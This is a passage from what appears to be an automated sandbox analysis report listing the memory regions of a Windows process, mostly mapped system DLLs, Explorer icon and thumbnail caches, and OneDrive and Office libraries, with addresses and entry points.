0x7fffb1ed64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3033 start_va = 0x7fffb2380000 end_va = 0x7fffb23c2fff monitored = 0 entry_point = 0x7fffb2394b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3034 start_va = 0x7fffb23d0000 end_va = 0x7fffb2424fff monitored = 0 entry_point = 0x7fffb23e7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3035 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3036 start_va = 0x7fffb2530000 end_va = 0x7fffb3a8efff monitored = 0 entry_point = 0x7fffb26911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3037 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3038 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3039 start_va = 0x7fffb3cd0000 end_va = 0x7fffb3d3efff monitored = 0 entry_point = 0x7fffb3cf5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 3040 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3041 start_va = 0x7fffb3f60000 end_va = 0x7fffb3f9afff monitored = 0 entry_point = 0x7fffb3f612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3042 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3043 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3044 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3045 start_va = 0x7fffb43f0000 end_va = 0x7fffb4549fff monitored = 0 entry_point = 0x7fffb44338e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3046 start_va = 0x7fffb45b0000 end_va = 0x7fffb46f2fff monitored = 0 entry_point = 0x7fffb45d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3047 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3048 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3049 start_va = 0x7fffb4f20000 end_va = 0x7fffb4f71fff monitored = 0 entry_point = 0x7fffb4f2f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3050 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3051 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3052 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 3053 start_va = 0x7fffa8a80000 end_va = 0x7fffa8cdcfff monitored = 0 entry_point = 0x7fffa8b08610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 3054 start_va = 0x7fffaf630000 end_va = 0x7fffaf6edfff monitored = 0 entry_point = 0x7fffaf672d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 3055 start_va = 0x7fffa9640000 end_va = 0x7fffa98c7fff monitored = 0 entry_point = 0x7fffa969f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 3056 start_va = 0x7fffa5c10000 end_va = 0x7fffa5d2ffff monitored = 0 entry_point = 0x7fffa5c48310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 3057 start_va = 0x7fffadf40000 end_va = 0x7fffae484fff monitored = 0 entry_point = 0x7fffae0da450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 3058 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 3059 start_va = 0x4470000 end_va = 0x4c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 3061 start_va = 0x4160000 end_va = 0x4194fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "transcodedwallpaper" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper") Region: id = 3062 start_va = 0x4c70000 end_va = 0x5161fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 3063 start_va = 0x4160000 end_va = 0x4192fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3064 start_va = 0x5170000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 3065 start_va = 0x7fffaa4c0000 end_va = 0x7fffaa52cfff monitored = 0 entry_point = 0x7fffaa4cd750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 3066 start_va = 0x5270000 end_va = 0x5761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3072 start_va = 0x7fffa5b30000 end_va = 0x7fffa5c0afff monitored = 0 entry_point = 0x7fffa5b428b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 3073 start_va = 0x7fffa5b00000 end_va = 0x7fffa5b25fff monitored = 0 entry_point = 0x7fffa5b01cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3074 start_va = 0x7fffa5930000 end_va = 0x7fffa5941fff monitored = 0 entry_point = 0x7fffa5933580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3075 start_va = 0x5770000 end_va = 0x57effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005770000" filename = "" Region: id = 3076 start_va = 0x3ee0000 end_va = 0x3ee3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3077 start_va = 0x3ef0000 end_va = 0x3ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ef0000" filename = "" Region: id = 3078 start_va = 0x3f00000 end_va = 0x3f23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 3079 start_va = 0x3f30000 end_va = 0x3f38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 3080 start_va = 0x3f40000 end_va = 0x3f48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 3081 start_va = 0x4160000 end_va = 0x4183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3082 start_va = 0x57f0000 end_va = 0x58effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 3083 start_va = 0x7fffa58e0000 end_va = 0x7fffa592cfff monitored = 0 entry_point = 0x7fffa58f7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 3084 start_va = 0x4190000 end_va = 0x4191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004190000" filename = "" Region: id = 3085 start_va = 0x41a0000 end_va = 0x41a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3086 start_va = 0x58f0000 end_va = 0x59effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3087 start_va = 0x41a0000 end_va = 0x41a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3088 start_va = 0x58f0000 end_va = 0x59effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3089 start_va = 0x4160000 end_va = 0x4161fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3090 start_va = 0x58f0000 end_va = 0x5937fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058f0000" filename = "" Region: id = 3091 start_va = 0x5940000 end_va = 0x5a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3092 start_va = 0x4160000 end_va = 0x4161fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3093 start_va = 0x5940000 end_va = 0x5a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3094 start_va = 0x5940000 end_va = 0x5a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3095 start_va = 0x4160000 end_va = 0x4161fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3096 start_va = 0x5940000 end_va = 0x5a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3097 start_va = 0x4160000 end_va = 0x4160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3098 start_va = 0x4170000 end_va = 0x4173fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 3099 start_va = 0x5940000 end_va = 0x5987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005940000" filename = "" Region: id = 3100 start_va = 0x5990000 end_va = 0x5a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005990000" filename = "" Region: id = 3101 start_va = 0x4180000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004180000" filename = "" Region: id = 3102 start_va = 0x4180000 end_va = 0x4181fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3103 start_va = 0x41a0000 end_va = 0x41a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 3104 start_va = 0x5990000 end_va = 0x5a8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3105 start_va = 0x7fffa5640000 end_va = 0x7fffa58dffff monitored = 0 entry_point = 0x7fffa56451e0 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 3106 start_va = 0x41b0000 end_va = 0x41b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041b0000" filename = "" Region: id = 3107 start_va = 0x5a90000 end_va = 0x5b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 3108 start_va = 0x7fffaaa50000 end_va = 0x7fffaabf8fff monitored = 0 entry_point = 0x7fffaaaa4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 3109 start_va = 0x5b10000 end_va = 0x650ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b10000" filename = "" Region: id = 3115 start_va = 0x41c0000 end_va = 0x41c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3116 start_va = 0x6510000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 3117 start_va = 0x41c0000 end_va = 0x41c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3118 start_va = 0x41d0000 end_va = 0x41d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3119 start_va = 0x6710000 end_va = 0x680ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3120 start_va = 0x6810000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 3121 start_va = 0x6890000 end_va = 0x6891fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3122 start_va = 0x7fffa54b0000 end_va = 0x7fffa563efff monitored = 0 entry_point = 0x7fffa54c01d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 3123 start_va = 0x7fffaacf0000 end_va = 0x7fffaad95fff monitored = 0 entry_point = 0x7fffaad3efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 3124 start_va = 0x68a0000 end_va = 0x699ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3125 start_va = 0x7fffa5130000 end_va = 0x7fffa53bdfff monitored = 0 entry_point = 0x7fffa5200f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3126 start_va = 0x7fffa53c0000 end_va = 0x7fffa54aefff monitored = 0 entry_point = 0x7fffa53e29cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 3127 start_va = 0x7fffaace0000 end_va = 0x7fffaace9fff monitored = 0 entry_point = 0x7fffaace1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3128 start_va = 0x7fffac500000 end_va = 0x7fffac881fff monitored = 0 entry_point = 0x7fffac551220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3129 start_va = 0x69a0000 end_va = 0x69a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3130 start_va = 0x69b0000 end_va = 0x69b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3131 start_va = 0x69c0000 end_va = 0x69d8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 3132 start_va = 0x69e0000 end_va = 0x6a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069e0000" filename = "" Region: id = 3133 start_va = 0x6a60000 end_va = 0x6a61fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3134 start_va = 0x6a70000 end_va = 0x6b6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3135 start_va = 0x7fffa4f10000 end_va = 0x7fffa5123fff monitored = 0 entry_point = 0x7fffa4f11000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 3136 start_va = 0x41c0000 end_va = 0x41c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3140 start_va = 0x69a0000 end_va = 0x69b8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 3141 start_va = 0x69c0000 end_va = 0x69c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000069c0000" filename = "" Region: id = 3142 start_va = 0x7fffaa9b0000 end_va = 0x7fffaa9c6fff monitored = 0 entry_point = 0x7fffaa9bc440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 3143 start_va = 0x7fffa4e70000 end_va = 0x7fffa4f0dfff monitored = 0 entry_point = 0x7fffa4eb9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 3144 start_va = 0x7fffb07f0000 end_va = 0x7fffb08e3fff monitored = 0 entry_point = 0x7fffb07fa960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3145 start_va = 0x7fffb10f0000 end_va = 0x7fffb10fafff monitored = 0 entry_point = 0x7fffb10f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3146 start_va = 0x69d0000 end_va = 0x69d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069d0000" filename = "" Region: id = 3165 start_va = 0x7fffa4b30000 end_va = 0x7fffa4e69fff monitored = 0 entry_point = 0x7fffa4b38520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 3166 start_va = 0x41c0000 end_va = 0x41c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041c0000" filename = "" Region: id = 3167 start_va = 0x6b70000 end_va = 0x6d28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 3168 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 3169 start_va = 0x7fffaa890000 end_va = 0x7fffaa8c6fff monitored = 0 entry_point = 0x7fffaa8920a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 3170 start_va = 0x7fffb4ae0000 end_va = 0x7fffb4f08fff monitored = 0 entry_point = 0x7fffb4b08740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3171 start_va = 0x7fffab020000 end_va = 0x7fffab035fff monitored = 0 entry_point = 0x7fffab021b60 region_type = mapped_file name = 